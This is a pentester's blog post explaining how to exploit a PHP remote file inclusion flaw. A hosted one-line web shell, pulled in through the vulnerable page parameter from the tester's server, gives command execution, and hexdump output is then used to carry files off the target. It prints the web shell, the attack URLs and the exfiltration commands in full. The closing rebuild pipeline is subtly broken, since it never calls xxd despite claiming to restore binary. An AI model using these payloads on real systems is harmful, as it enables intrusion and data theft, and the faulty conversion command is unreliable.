Handy File Transfer Technique

Introduction

Contrary to this blog’s usual material, this time I want to write about a quick technique I found to work pretty well today for transferring files between two hosts using the xxd and hexdump utilities!

I needed to use this technique as part of a pentest, as the host was a bit limited on the tools on the box. The prerequisites for this to happen are a page with a file inclusion vulnerability (preferably remote) and for the PHP configuration to not have turned off the system function.

Scenario

The host was a 3-bit RHEL 3.6 and with kernel version 2.6.9-89. The scenario was a vulnerable web-app with a remote file inclusion vulnerability. I wanted to use file inclusion in order to view file contents, but since it was a PHP website the PHP engine would render the files as part of the page rather than include them.

In addition to the above, I was unable to use PHP’s stream filters in order to encode the contents and base64 was not installed on the host (more on this later).

The solution

As the file inclusion is a remote file inclusion, it means that we can host a file on our server that looks like this:

<?php system($_GET['cmd']); ?>

If we save that on our server’s root as shell.php, and the file inclusion looks something like:

http://victim.com/index.php?page=<insert page here>

then we can simple request

http://victim.com/index.php?page=http://myaddress.here/shell.php&cmd=<standard unix commands>

We’ve exploited RFI to gain command execution, and from there on we can get to a shell. However, my problem was reading the code of the pages. Through the command injection I tried doing something along the lines of cat page | base64 but to no avail as base64 was not installed (a big wat moment)! Luckily, hexdump was installed instead!

hexdump[1] is a unix utility that will take a file as input and spit it out in a hex encoded format. We can use this in conjunction with xxd[2] (which was not present the target machine) on our end in order to turn the file back into binary!

So the attack would look like this:

http://victim.com/index.php?page=http://myaddress.here/shell.php&cmd=hexdump%20file.zip

And the output on the page would look something like

0000000 8b1f 0008 e495 52c0 0300 bdec 5fff 371b
0000010 3ff2 fafe fb35 f078 a83f f17e db39 b18d
0000020 2131 0a5f 9481 6902 1d79 0e01 7348 137d
.......

You might need to tweak this output by removing any empty lines from the end of the output, as I’ve run into situations where hexdump has appended some empty lines at the end of the dump for no apparent reason. Save this to a text file called file.hexdump so we can process it some more and turn it back into binary!

The catch is that xxd expects the input to look like a long hexadecimal string, but with the digits in reverse order. As an example, while hexdump would output 8b1f, xxd would expect to read in 1f8b in order to correctly reverse the input (notice the upcoming sed train). The final command to turn file.hexdump back into file.zip is:

cat file.hexdump | cut -d' ' -f2,3,4,5,6,7,8,9 | tr -d "\n" | sed -e "s/ //g" -e "s/\([a-f0-9]\{2\}\)\([a-f0-9]\{2\}\)/\2\1/g" > file.zip

After this, we can see the target zip file manifesting itself back into a zip file!

Conclusion

This technique if of course a general purpose technique, however the more interesting cases arise when we need to grab binary files from a webserver as it can some times be a bit tricky to exploit that with file inclusion. This technique aims to help with downloading binary files by exploiting file inclusion and command injection in order to render the files on the page as ASCII text, which we can afterwards convert back into binary!

Links

[1] http://linux.die.net/man/1/hexdump

[2] http://linux.die.net/man/1/xxd

Advertisements
Handy File Transfer Technique

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s